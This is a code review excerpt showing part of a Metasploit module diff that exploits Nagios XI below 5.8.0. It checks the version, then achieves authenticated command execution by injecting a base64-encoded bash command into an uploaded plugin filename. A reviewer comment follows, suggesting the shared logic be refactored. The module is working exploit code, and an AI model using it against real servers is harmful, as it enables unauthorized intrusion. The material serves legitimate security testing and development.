modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb

```diff
@@ -0,0 +1,206 @@
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
+    print_good('Successfully authenticated to Nagios XI')
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+    end
+
+    print_status("Target is Nagios XI with version #{nagios_version}")
+    # check if the target is actually vulnerable
+    version = Rex::Version.new(nagios_version)
+    if version < Rex::Version.new('5.8.0')
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    # encode the payload, which is necessary for the exploit to work
+    payload_ascii = Rex::Text.to_hex_ascii(cmd)
+    payload_base64 = Rex::Text.encode_base64(payload_ascii)
+    payload = ";echo #{payload_base64} | base64 -d | bash;#"
+    register_file_for_cleanup("/usr/local/nagios/libexec/#{payload}") # deleting the payload via the web interface doesn't seem possible
+
+    # generate post data
+    post_data = Rex::MIME::Message.new
+    random_post_content = rand_text_alphanumeric(8..12)
+    post_data.add_part('', nil, nil, 'form-data; name="upload"')
+    post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"')
+    post_data.add_part(random_post_content, 'text/plain', nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload}\"")
+    post_data.add_part('1', nil, nil, 'form-data; name="convert_to_unix"')
+
+    # upload payload
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => @auth_cookies,
+      'data' => post_data.to_s
+    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
+      'cookie' => @auth_cookies
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Manage Plugins &middot; Nagios XI</title>')
+      fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    # grab the nsp token, using the Nagios XI mixin
+    @nsp = get_nsp(res)
```

Comment:
Sorry hate to ask this but considering how both your last module and this module have this logic, I'm curious if this shouldn't be part of either A) the mixin itself or B) a separate function.